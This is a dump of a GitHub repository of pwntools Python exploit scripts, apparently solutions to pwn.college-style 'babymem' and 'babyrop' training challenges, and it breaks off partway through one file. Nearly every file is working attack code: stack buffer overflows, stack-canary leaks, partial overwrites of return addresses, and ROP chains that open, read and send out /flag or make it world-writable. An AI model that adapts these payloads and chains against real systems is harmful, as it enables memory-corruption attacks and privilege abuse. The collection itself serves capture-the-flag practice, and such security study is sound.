├── LICENSE ├── README.md ├── codebof1.py ├── codebof10.py ├── codebof10m1.py ├── codebof12.py ├── codebof12m1.py ├── codebof14.py ├── codebof14m1.py ├── codebof15.py ├── codebof1m1.py ├── codebof2.py ├── codebof2m1.py ├── codebof3.py ├── codebof3m1.py ├── codebof6.py ├── codebof6m1.py ├── codebof7.py ├── codebof7m1.py ├── codebof8.py ├── codebof8m1.py ├── codebof9.py ├── codebof9m1.py ├── coderop1.py ├── coderop1m1.py ├── coderop2.py ├── coderop2m1.py ├── coderop3.py ├── coderop3m1.py ├── coderop4.py ├── coderop4m1.py ├── coderop5.py ├── coderop5m1.py ├── coderop6.py ├── coderop6m1.py ├── coderop7.py ├── coderop7m1.py ├── coderop8.py ├── coderop8m1.py ├── codeshellcode1.py ├── codeshellcode2.py ├── codeshellcode3.py ├── codeshellcode4.py └── codeshellcode5.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Davide Netti 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SoftwareSecurityNotes 2 | Exploits with pwntools library in Python3. ROP, BOF, SHELLCODE. 3 | -------------------------------------------------------------------------------- /codebof1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level1.0") 5 | context.arch = "amd64" 6 | context.endian = "little" 7 | io = elf.process() 8 | 9 | buffer_length = int("58", 16) #local_58 10 | value_to_modify_distance = int("20", 16) #local_20 11 | distance_between_buffer_and_value_to_modify = buffer_length - value_to_modify_distance 12 | 13 | # Payload 14 | 15 | payload = b"A"*distance_between_buffer_and_value_to_modify + p64(0x1) + b"B"*value_to_modify_distance*8 16 | 17 | io.recvuntil("size:") 18 | io.sendline(str(buffer_length)) 19 | 20 | io.recvuntil("bytes)!") 21 | io.sendline(payload) 22 | 23 | io.interactive() -------------------------------------------------------------------------------- /codebof10.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level10.0") 5 | 6 | buffer_length = int("158", 16) #local_158 7 | flag_offset_from_buffer= int("0x3a", 16) #local_160 declared as local_158 putted in RAX + 0x3a (ADD assembly instruction) 8 | 9 | print(buffer_length) 10 | print(flag_offset_from_buffer) 11 | 12 | io = elf.process() 13 | 14 | # Payload 15 | payload = b"A"*(flag_offset_from_buffer) 16 | 17 | # Interaction 18 | io.recvuntil("size:") 19 | io.sendline(str(flag_offset_from_buffer)) 20 | 21 | io.recvuntil("bytes)!") 22 | io.sendline(payload) 23 | 24 | io.interactive() 25 | -------------------------------------------------------------------------------- /codebof10m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level10.1") 5 | 6 | buffer_length = int("158", 16) #local_158 7 | read_offset = int("47", 16) #local_158 + 0x47 for the declaration of local_160 (the point where the flag readed is saved) 8 | 9 | io = elf.process() 10 | 11 | # Payload 12 | payload = b"A"*read_offset 13 | 14 | # Interaction 15 | io.recvuntil("size:") 16 | io.sendline(str(read_offset)) 17 | 18 | io.recvuntil("bytes)!") 19 | io.sendline(payload) 20 | 21 | io.interactive() -------------------------------------------------------------------------------- /codebof12.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | while True: 4 | # Init 5 | elf = ELF("/challenge/babymem_level12.0") 6 | context.arch = "amd64" 7 | context.endian = "little" 8 | 9 | # Vars 10 | distance_canary = 16 #0x10 11 | buffer_length = 120 #local_78 12 | distance_between_buffer_and_canary = buffer_length - distance_canary 13 | 14 | io = elf.process() 15 | 16 | # Leak the canary 17 | io.recvuntil("size:") 18 | io.sendline(f'{distance_between_buffer_and_canary + 1}') 19 | io.recvuntil("bytes)!") 20 | 21 | payload_first_run = b'A' * (distance_between_buffer_and_canary - 6) + b'REPEATZ' 22 | io.sendline(payload_first_run) 23 | 24 | io.recvuntil(b'REPEATZ') 25 | canary = b'\x00' + io.recvline().strip()[:7] 26 | print(len(canary)) 27 | print(canary) 28 | # Second run 29 | io.recvuntil("size:") 30 | io.sendline(f'{buffer_length + 2}') 31 | 32 | payload = b"A"*(distance_between_buffer_and_canary) + canary + b'A'*8 + b'\xd4\x1c' 33 | io.recvuntil("bytes)!") 34 | io.send(payload) 35 | io.interactive() -------------------------------------------------------------------------------- /codebof12m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | while True: 4 | # Init 5 | elf = ELF("/challenge/babymem_level12.1") 6 | context.arch = "amd64" 7 | context.endian = "little" 8 | 9 | # Vars 10 | distance_canary = 16 #0x10 11 | buffer_length = 72 #local_48 12 | distance_between_buffer_and_canary = buffer_length - distance_canary 13 | 14 | io = elf.process() 15 | 16 | # Leak the canary 17 | io.recvuntil("size:") 18 | io.sendline(f'{distance_between_buffer_and_canary + 1}') 19 | io.recvuntil("bytes)!") 20 | 21 | payload_first_run = b'A' * (distance_between_buffer_and_canary - 6) + b'REPEATZ' 22 | io.sendline(payload_first_run) 23 | 24 | io.recvuntil(b'REPEATZ') 25 | canary = b'\x00' + io.recvline().strip()[:7] 26 | print(len(canary)) 27 | print(canary) 28 | # Second run 29 | io.recvuntil("size:") 30 | io.sendline(f'{buffer_length + 2}') 31 | 32 | payload = b"A"*(distance_between_buffer_and_canary) + canary + b'A'*8 + b'\xe6\x1f' 33 | io.recvuntil("bytes)!") 34 | io.send(payload) 35 | io.interactive() -------------------------------------------------------------------------------- /codebof14.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | while True: 4 | # Init 5 | elf = ELF("/challenge/babymem_level14.0") 6 | context.arch = "amd64" 7 | context.endian = "little" 8 | 9 | # Vars 10 | distance_canary = 16 #0x10 11 | buffer_length = 328 #local_148 12 | distance_between_buffer_and_canary = buffer_length - distance_canary 13 | 14 | io = elf.process() 15 | 16 | # Leak the canary 17 | io.recvuntil("size:") 18 | io.sendline(f'{41}') 19 | io.recvuntil("bytes)!") 20 | 21 | payload_first_run = b'A'*(34) + b'REPEATZ' 22 | io.sendline(payload_first_run) 23 | 24 | io.recvuntil(b'REPEATZ') 25 | canary = b'\x00' + io.recvline().strip()[:7] 26 | print(len(canary)) 27 | print(canary) 28 | 29 | # Second run 30 | io.recvuntil("size:") 31 | io.sendline(f'{buffer_length + 2}') 32 | 33 | payload = b"A"*(distance_between_buffer_and_canary) + canary + b'A'*8 + b'\x76\x20' 34 | io.recvuntil("bytes)!") 35 | io.send(payload) 36 | io.interactive() -------------------------------------------------------------------------------- /codebof14m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 140722928488912 3 | 4 | 5 | while True: 6 | # Init 7 | elf = ELF("/challenge/babymem_level14.1") 8 | context.arch = "amd64" 9 | context.endian = "little" 10 | 11 | # Vars 12 | distance_canary = 16 #0x10 13 | buffer_length = 504 #local_1f8 14 | distance_between_buffer_and_canary = buffer_length - distance_canary 15 | 16 | io = elf.process() 17 | 18 | # Leak the canary 19 | io.recvuntil("size:") 20 | io.sendline(f'{217}') 21 | io.recvuntil("bytes)!") 22 | 23 | payload_first_run = b'A'*(210) + b'REPEATZ' 24 | io.sendline(payload_first_run) 25 | 26 | io.recvuntil(b'REPEATZ') 27 | canary = b'\x00' + io.recvline().strip()[:7] 28 | print(len(canary)) 29 | print(canary) 30 | 31 | # Second run 32 | io.recvuntil("size:") 33 | io.sendline(f'{buffer_length + 2}') 34 | 35 | payload = b"A"*(distance_between_buffer_and_canary) + canary + b'A'*8 + b'\x43\x1e' 36 | io.recvuntil("bytes)!") 37 | io.send(payload) 38 | io.interactive() -------------------------------------------------------------------------------- /codebof15.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | conn = remote("127.0.0.1", 1337) 5 | 6 | buffer_length = int("78", 16) #local_78 7 | distance_of_the_canary = int("10", 16) #local_10 8 | distance_between_buffer_and_canary = buffer_length - distance_of_the_canary 9 | 10 | 11 | # Payload 12 | payload = b"A"*distance_between_buffer_and_canary + b"\x00\x35\x12\x2f\xb4\x9c\xe5\x96" + b"A"*(buffer_length - distance_between_buffer_and_canary - 8) + b"\x9c\x17" 13 | 14 | conn.recvuntil("size:") 15 | conn.sendline(str(buffer_length + 2)) 16 | 17 | conn.recvuntil("bytes)!") 18 | conn.sendline(payload) 19 | 20 | conn.interactive() -------------------------------------------------------------------------------- /codebof1m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level1.1") 5 | 6 | buffer_length = int("38", 16) #local_38 7 | distance_from_variable_to_win = int("18", 16) #local_18 8 | distance_between_buffer_and_variable = buffer_length - distance_from_variable_to_win 9 | 10 | io = elf.process() 11 | 12 | # Payload 13 | payload = b"A"*distance_between_buffer_and_variable + p64(0x1) + b"B"*distance_from_variable_to_win + b"B"*8 14 | 15 | # Interaction 16 | io.recvuntil("size:") 17 | io.sendline(str(buffer_length)) 18 | 19 | io.recvuntil("bytes)!") 20 | io.sendline(payload) 21 | 22 | io.interactive() -------------------------------------------------------------------------------- /codebof2.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level2.0") 5 | 6 | buffer_length = int("20", 16) #local_20 7 | distance_win_variable = int("18", 16) #local_18 8 | distance_between_buffer_and_win_variable = buffer_length - distance_win_variable 9 | 10 | io = elf.process() 11 | 12 | # Payload 13 | 14 | payload = b"A"*500 15 | 16 | # Interaction 17 | 18 | io.recvuntil("size:") 19 | io.sendline(str(500)) 20 | 21 | io.recvuntil("bytes)!") 22 | io.sendline(payload) 23 | 24 | io.interactive() -------------------------------------------------------------------------------- /codebof2m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level2.1") 5 | 6 | buffer_length = int("20", 16) #local_20 7 | distance_win_variable = int("18", 16) #local_18 8 | distance_between_buffer_and_win_variable = buffer_length - distance_win_variable 9 | 10 | io = elf.process() 11 | 12 | # Payload 13 | 14 | payload = b"A"*500 15 | 16 | # Interaction 17 | 18 | io.recvuntil("size:") 19 | io.sendline(str(500)) 20 | 21 | io.recvuntil("bytes)!") 22 | io.sendline(payload) 23 | 24 | io.interactive() -------------------------------------------------------------------------------- /codebof3.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level3.0") 5 | buffer_length = int("68", 16) #local_68 6 | 7 | address_win_function = p64(0x401cf9) 8 | 9 | io = elf.process() 10 | 11 | # Payload 12 | payload = b"A"*buffer_length + address_win_function 13 | 14 | # Interaction 15 | io.recvuntil("size:") 16 | io.sendline(str(buffer_length + 8)) 17 | 18 | io.recvuntil("bytes)!") 19 | io.sendline(payload) 20 | 21 | io.interactive() -------------------------------------------------------------------------------- /codebof3m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level3.1") 5 | 6 | buffer_length = int("88", 16) #local_88 7 | 8 | address_win_function = p64(0x402065) 9 | 10 | io = elf.process() 11 | 12 | # Payload 13 | 14 | payload = b'A'*buffer_length + address_win_function 15 | 16 | # Interaction 17 | io.recvuntil("size:") 18 | io.sendline(str(buffer_length + 8)) 19 | 20 | io.recvuntil("bytes)!") 21 | io.sendline(payload) 22 | 23 | io.interactive() -------------------------------------------------------------------------------- /codebof6.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # init 4 | elf = ELF("/challenge/babymem_level6.0") 5 | 6 | buffer_length = int("58", 16) #local_58 7 | 8 | win_auth_address = p64(0x401612) 9 | 10 | io = elf.process() 11 | 12 | # Payload 13 | payload = b"A"*buffer_length + win_auth_address 14 | 15 | # Interaction 16 | io.recvuntil("size:") 17 | io.sendline(str(buffer_length + 8)) 18 | 19 | io.recvuntil("bytes)!") 20 | io.sendline(payload) 21 | 22 | io.interactive() -------------------------------------------------------------------------------- /codebof6m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level6.1") 5 | 6 | buffer_length = int("68", 16) #local_68 7 | 8 | io = elf.process() 9 | 10 | # payload 11 | payload = b"A"*(buffer_length) + p64(0x4016a6) 12 | 13 | # Interaction 14 | io.recvuntil("size:") 15 | io.sendline(str(buffer_length + 8)) 16 | 17 | io.recvuntil("bytes)!") 18 | io.sendline(payload) 19 | 20 | io.interactive() -------------------------------------------------------------------------------- /codebof7.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | while(1): 4 | # Init 5 | elf = ELF("/challenge/babymem_level7.0") 6 | 7 | buffer_length = int("98", 16) 8 | 9 | io = elf.process() 10 | 11 | # Payload 12 | payload = b"A"*buffer_length + b"\xfc\x18" 13 | 14 | # Interaction 15 | io.recvuntil("size:") 16 | io.sendline(str(buffer_length + 2)) 17 | 18 | io.recvuntil("bytes)!") 19 | io.sendline(payload) 20 | 21 | io.interactive() -------------------------------------------------------------------------------- /codebof7m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | while(1): 4 | 5 | # Init 6 | elf = ELF("/challenge/babymem_level7.1") 7 | 8 | buffer_length = int("48", 16) #local_48 9 | win_auth_address_offset = b"\x2a\x14" 10 | 11 | io = elf.process() 12 | 13 | # Payload 14 | payload = b"A"*buffer_length + win_auth_address_offset 15 | 16 | # Interaction 17 | io.recvuntil("size:") 18 | io.sendline(str(buffer_length + 2)) 19 | 20 | io.recvuntil("bytes)!") 21 | io.sendline(payload) 22 | 23 | io.interactive() 24 | -------------------------------------------------------------------------------- /codebof8.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | while(1): 4 | # Init 5 | elf = ELF("/challenge/babymem_level8.0") 6 | 7 | buffer_length = int("58", 16) #local_58 8 | length_variable_distance = int("28", 16) #local_28 9 | dimension_control = int("24", 16) #0x24 10 | distance_between_buffer_length_and_length_variable = buffer_length - length_variable_distance - 8 - 8 #ret_address and base pointer 11 | print(distance_between_buffer_length_and_length_variable) 12 | 13 | word_local_28 = p64(0x0) 14 | 15 | offset_win_auth = b"\xe6\x1a" 16 | 17 | io = elf.process() 18 | 19 | # Payload 20 | payload = b"A"*(distance_between_buffer_length_and_length_variable) + word_local_28 + b"A"*(buffer_length - distance_between_buffer_length_and_length_variable - 8) + offset_win_auth 21 | 22 | # Interaction 23 | io.recvuntil("size:") 24 | io.sendline(str(buffer_length + 2)) 25 | 26 | io.recvuntil("bytes)!") 27 | io.sendline(payload) 28 | 29 | io.interactive() 30 | 31 | 32 | -------------------------------------------------------------------------------- /codebof8m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | while(1): 4 | 5 | # Init 6 | elf = ELF("/challenge/babymem_level8.1") 7 | 8 | buffer_length = int("48", 16) #local_48 9 | win_auth_offset = b"\xfc\x22" 10 | variable_local_28_which_control_the_length = int("28", 16) #local_28 11 | distance_between_buffer_and_local_28 = buffer_length - variable_local_28_which_control_the_length - 8 12 | 13 | print(str(distance_between_buffer_and_local_28)) 14 | 15 | io = elf.process() 16 | 17 | # Payload 18 | payload = b"A"*distance_between_buffer_and_local_28 + p64(0x0) + b"A"* (buffer_length - distance_between_buffer_and_local_28 - 8) + win_auth_offset 19 | 20 | # Interaction 21 | io.recvuntil("size:") 22 | io.sendline(str(buffer_length + 2)) 23 | 24 | io.recvuntil("bytes)!") 25 | io.sendline(payload) 26 | 27 | io.interactive() 28 | 29 | -------------------------------------------------------------------------------- /codebof9.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | while(1): 4 | # Init 5 | elf = ELF("/challenge/babymem_level9.0") 6 | 7 | buffer_length = int("58", 16) #local_58 8 | addition_data = int("18", 16) #local_18 9 | distance_between_buffer_and_variable_n = buffer_length - addition_data 10 | win_auth_address_offset = b"\x1e\x24" 11 | print(buffer_length) 12 | print(addition_data) 13 | 14 | io = elf.process() 15 | 16 | # Payload 17 | payload = b"A"*(distance_between_buffer_and_variable_n) + p64(0x50) + win_auth_address_offset 18 | 19 | # Interaction 20 | io.recvuntil("size:") 21 | io.sendline(str(buffer_length + 2)) 22 | 23 | io.recvuntil("bytes)!") 24 | io.sendline(payload) 25 | 26 | io.interactive() 27 | -------------------------------------------------------------------------------- /codebof9m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babymem_level9.1") 5 | 6 | buffer_length = int("58", 16) #local_58 7 | distance_variable_n = int("14", 16) #local_18 + 4 8 | distance_between_buffer_and_n = buffer_length - distance_variable_n 9 | 10 | print(buffer_length) 11 | print(distance_variable_n) 12 | print(distance_between_buffer_and_n) 13 | 14 | io = elf.process() 15 | 16 | # Payload 17 | payload = b"A"*(distance_between_buffer_and_n) + p64(0x50) + b"\x87\x19" 18 | 19 | # Interaction 20 | io.recvuntil("size:") 21 | io.sendline(str(buffer_length + 2)) 22 | 23 | io.recvuntil("bytes)!") 24 | io.sendline(payload) 25 | 26 | io.interactive() -------------------------------------------------------------------------------- /coderop1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babyrop_level1.0") 5 | 6 | # Vars 7 | buffer_length = 104 #local_68 8 | ret_addr_win_function = p64(elf.symbols.win) 9 | 10 | # Payload 11 | payload = b"A"*buffer_length + ret_addr_win_function 12 | 13 | #Action 14 | io = elf.process() 15 | io.recvuntil(b'the return address).') 16 | io.sendline(payload) 17 | 18 | io.interactive() -------------------------------------------------------------------------------- /coderop1m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | # Init 3 | elf = ELF("/challenge/babyrop_level1.1") 4 | context.arch = "amd64" 5 | context.endian = "little" 6 | 7 | 8 | # Vars 9 | buffer_length = 140 + 4 + 8 # local_98 and variable int 4 byte (local_c) + EBP 10 | ret_address_win_function = p64(elf.symbols.win) 11 | io = elf.process() 12 | 13 | # Payload 14 | payload = b"A"*buffer_length + ret_address_win_function 15 | 16 | # Action 17 | io.sendline(payload) 18 | io.interactive() -------------------------------------------------------------------------------- /coderop2.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | # Init 3 | elf = ELF("/challenge/babyrop_level2.0") 4 | context.arch = "amd64" 5 | context.endian = "little" 6 | 7 | 8 | # Vars 9 | buffer_length = 108 + 4 + 8 # local_78 and variable int 4 byte (local_c) + EBP 10 | ret_address_win_stage_1_function = p64(elf.symbols.win_stage_1) 11 | ret_address_win_stage_2_function = p64(elf.symbols.win_stage_2) 12 | io = elf.process() 13 | 14 | # Payload 15 | payload = b"A"*buffer_length + ret_address_win_stage_1_function + ret_address_win_stage_2_function 16 | 17 | # Action 18 | io.sendline(payload) 19 | io.interactive() -------------------------------------------------------------------------------- /coderop2m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | # Init 3 | elf = ELF("/challenge/babyrop_level2.1") 4 | context.arch = "amd64" 5 | context.endian = "little" 6 | 7 | 8 | # Vars 9 | buffer_length = 44 + 4 + 8 # local_38 and variable int 4 byte (local_c) + EBP 10 | ret_address_win_stage_1_function = p64(elf.symbols.win_stage_1) 11 | ret_address_win_stage_2_function = p64(elf.symbols.win_stage_2) 12 | io = elf.process() 13 | 14 | # Payload 15 | payload = b"A"*buffer_length + ret_address_win_stage_1_function + ret_address_win_stage_2_function 16 | 17 | # Action 18 | io.sendline(payload) 19 | io.interactive() -------------------------------------------------------------------------------- /coderop3.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | # Init 3 | elf = ELF("/challenge/babyrop_level3.0") 4 | context.arch = "amd64" 5 | context.endian = "little" 6 | 7 | 8 | # Vars 9 | buffer_length = 60 + 4 + 8 # local_48 and variable int 4 byte (local_c) + EBP 10 | gadget_addr = p64(0x0000000000402a23) 11 | 12 | param1 = p64(0x1) 13 | stage_1_address = p64(elf.symbols.win_stage_1) 14 | 15 | param2 = p64(0x2) 16 | stage_2_address = p64(elf.symbols.win_stage_2) 17 | 18 | param3 = p64(0x3) 19 | stage_3_address = p64(elf.symbols.win_stage_3) 20 | 21 | param4 = p64(0x4) 22 | stage_4_address = p64(elf.symbols.win_stage_4) 23 | 24 | param5 = p64(0x5) 25 | stage_5_address = p64(elf.symbols.win_stage_5) 26 | 27 | io = elf.process() 28 | 29 | # Payload 30 | payload = b"A"*buffer_length + gadget_addr + param1 + stage_1_address + gadget_addr + param2 + stage_2_address + gadget_addr + param3 + stage_3_address + gadget_addr + param4 + stage_4_address + gadget_addr + param5 + stage_5_address 31 | 32 | # Action 33 | io.sendline(payload) 34 | io.interactive() -------------------------------------------------------------------------------- /coderop3m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | # Init 3 | elf = ELF("/challenge/babyrop_level3.1") 4 | context.arch = "amd64" 5 | context.endian = "little" 6 | 7 | 8 | # Vars 9 | buffer_length = 44 + 4 + 8 # local_38 and variable int 4 byte (local_c) + EBP 10 | gadget_addr = p64(0x0000000000401a13) 11 | 12 | param1 = p64(0x1) 13 | stage_1_address = p64(elf.symbols.win_stage_1) 14 | 15 | param2 = p64(0x2) 16 | stage_2_address = p64(elf.symbols.win_stage_2) 17 | 18 | param3 = p64(0x3) 19 | stage_3_address = p64(elf.symbols.win_stage_3) 20 | 21 | param4 = p64(0x4) 22 | stage_4_address = p64(elf.symbols.win_stage_4) 23 | 24 | param5 = p64(0x5) 25 | stage_5_address = p64(elf.symbols.win_stage_5) 26 | 27 | io = elf.process() 28 | 29 | # Payload 30 | payload = b"A"*buffer_length + gadget_addr + param1 + stage_1_address + gadget_addr + param2 + stage_2_address + gadget_addr + param3 + stage_3_address + gadget_addr + param4 + stage_4_address + gadget_addr + param5 + stage_5_address 31 | 32 | # Action 33 | io.sendline(payload) 34 | io.interactive() -------------------------------------------------------------------------------- /coderop4.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babyrop_level4.0") 5 | context.arch = "amd64" 6 | context.endian = "little" 7 | io = elf.process() 8 | 9 | # Vars 10 | buffer_length = 44 + 4 + 8 # local_38 and variable int 4 byte (local_c) + EBP 11 | io.recvuntil("at:") 12 | buffer_addr = io.recvline()[1:15].decode() 13 | buffer_addr = p64(int(buffer_addr, 16)) 14 | 15 | syscall_gadget = p64(0x0000000000401e0a) 16 | set_rdi_registry_gadget = p64(0x0000000000401e32) 17 | set_rsi_registry_gadget = p64(0x0000000000401e42) 18 | set_rdx_registry_gadget = p64(0x0000000000401e13) 19 | set_rax_registry_gadget = p64(0x0000000000401e22) 20 | #push_rax_registry_gadget = p64(0x0000000000401209) 21 | 22 | # Payload 23 | payload = b"/flag" + b"\x00" + b"A"*(buffer_length - 6) + set_rax_registry_gadget + p64(0x3) + set_rdi_registry_gadget + p64(0x0) + syscall_gadget +set_rax_registry_gadget + p64(0x2) 24 | payload += set_rdi_registry_gadget + buffer_addr + set_rsi_registry_gadget + p64(0x0) + set_rdx_registry_gadget + p64(0x0) + syscall_gadget 25 | payload += set_rax_registry_gadget + p64(0x0) + set_rdi_registry_gadget + p64(0x0) + set_rsi_registry_gadget + buffer_addr + set_rdx_registry_gadget + p64(0x38) + syscall_gadget 26 | payload += set_rax_registry_gadget + p64(0x1) + set_rdi_registry_gadget + p64(0x1) + set_rsi_registry_gadget + buffer_addr + set_rdx_registry_gadget + p64(0x38) + syscall_gadget 27 | 28 | # Action 29 | io.sendline(payload) 30 | io.interactive() -------------------------------------------------------------------------------- /coderop4m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babyrop_level4.1") 5 | context.arch = "amd64" 6 | context.endian = "little" 7 | io = elf.process() 8 | 9 | # Vars 10 | buffer_length = 124 + 4 + 8 # local_88 and variable int 4 byte (local_c) + EBP 11 | io.recvuntil("at:") 12 | buffer_addr = io.recvline()[1:15].decode() 13 | buffer_addr = p64(int(buffer_addr, 16)) 14 | 15 | syscall_gadget = p64(0x000000000040127c) 16 | set_rdi_registry_gadget = p64(0x0000000000401254) 17 | set_rsi_registry_gadget = p64(0x0000000000401284) 18 | set_rdx_registry_gadget = p64(0x000000000040125d) 19 | set_rax_registry_gadget = p64(0x000000000040126d) 20 | #push_rax_registry_gadget = p64(0x0000000000401209) 21 | 22 | # Payload 23 | payload = b"/flag" + b"\x00" + b"A"*(buffer_length - 6) + set_rax_registry_gadget + p64(0x3) + set_rdi_registry_gadget + p64(0x0) + syscall_gadget +set_rax_registry_gadget + p64(0x2) 24 | payload += set_rdi_registry_gadget + buffer_addr + set_rsi_registry_gadget + p64(0x0) + set_rdx_registry_gadget + p64(0x0) + syscall_gadget 25 | payload += set_rax_registry_gadget + p64(0x0) + set_rdi_registry_gadget + p64(0x0) + set_rsi_registry_gadget + buffer_addr + set_rdx_registry_gadget + p64(0x38) + syscall_gadget 26 | payload += set_rax_registry_gadget + p64(0x1) + set_rdi_registry_gadget + p64(0x1) + set_rsi_registry_gadget + buffer_addr + set_rdx_registry_gadget + p64(0x38) + syscall_gadget 27 | 28 | # Action 29 | io.sendline(payload) 30 | io.interactive() -------------------------------------------------------------------------------- /coderop5.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babyrop_level5.0") 5 | context.arch = "amd64" 6 | context.endian = "little" 7 | io = elf.process() 8 | 9 | # Vars 10 | buffer_length = 124 + 4 + 8 # local_88 and variable int 4 byte (local_c) + EBP 11 | io.recvuntil("concept of Return Oriented Programming!") 12 | 13 | 14 | leaving_addr = p64(0x0040335a) 15 | syscall_gadget = p64(0x0000000000401df1) 16 | set_rdi_registry_gadget = p64(0x0000000000401e11) 17 | set_rsi_registry_gadget = p64(0x0000000000401de1) 18 | set_rax_registry_gadget = p64(0x0000000000401dea) 19 | access_rights = p64(0o777) 20 | 21 | # Payload 22 | payload = b"A"*buffer_length + set_rax_registry_gadget + p64(0x5a) + set_rdi_registry_gadget + leaving_addr + set_rsi_registry_gadget + access_rights + syscall_gadget 23 | 24 | # Action 25 | io.sendline(payload) 26 | io.interactive() -------------------------------------------------------------------------------- /coderop5m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Init 4 | elf = ELF("/challenge/babyrop_level5.1") 5 | context.arch = "amd64" 6 | context.endian = "little" 7 | io = elf.process() 8 | 9 | # Vars 10 | buffer_length = 76 + 4 + 8 # local_58 and variable int 4 byte (local_c) + EBP 11 | 12 | 13 | leaving_addr = p64(0x00403004) 14 | syscall_gadget = p64(0x0000000000402123) 15 | set_rdi_registry_gadget = p64(0x000000000040213b) 16 | set_rsi_registry_gadget = p64(0x000000000040212b) 17 | set_rax_registry_gadget = p64(0x000000000040211c) 18 | access_rights = p64(0o777) 19 | 20 | # Payload 21 | payload = b"A"*buffer_length + set_rax_registry_gadget + p64(0x5a) + set_rdi_registry_gadget + leaving_addr + set_rsi_registry_gadget + access_rights + syscall_gadget 22 | 23 | # Action 24 | io.sendline(payload) 25 | io.interactive() -------------------------------------------------------------------------------- /coderop6.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | # Init 5 | elf = ELF("/challenge/babyrop_level6.0") 6 | context.arch = "amd64" 7 | context.endian = "little" 8 | io = elf.process() 9 | 10 | # Vars 11 | buffer_length = 44 + 4 + 8 # local_38 and variable int 4 byte (local_c) + EBP 12 | 13 | open_function_addr = p64(0x004011d0) 14 | sendfile_function_addr = p64(0x004011a0) 15 | leaving_addr = p64(0x40335a) 16 | set_rdi_registry_gadget = p64(0x0000000000402342) 17 | set_rsi_registry_gadget = p64(0x0000000000402352) 18 | set_rdx_registry_gadget = p64(0x000000000040233a) 19 | set_rcx_registry_gadget = p64(0x000000000040234a) 20 | 21 | # Payload 22 | payload = b"A"*buffer_length + set_rdi_registry_gadget + leaving_addr + set_rsi_registry_gadget + p64(0x0) + set_rdx_registry_gadget + p64(0x0) + open_function_addr +\ 23 | set_rdi_registry_gadget + p64(0x1) + set_rsi_registry_gadget + p64(0x3) + set_rdx_registry_gadget + p64(0x0) + set_rcx_registry_gadget + p64(0x100) + sendfile_function_addr 24 | 25 | 26 | # Action 27 | io.sendline(payload) 28 | io.interactive() 29 | -------------------------------------------------------------------------------- /coderop6m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | # Init 5 | elf = ELF("/challenge/babyrop_level6.1") 6 | context.arch = "amd64" 7 | context.endian = "little" 8 | io = elf.process() 9 | 10 | # Vars 11 | buffer_length = 124 + 4 + 8 # local_88 and variable int 4 byte (local_c) + EBP 12 | 13 | open_function_addr = p64(0x00401100) 14 | sendfile_function_addr = 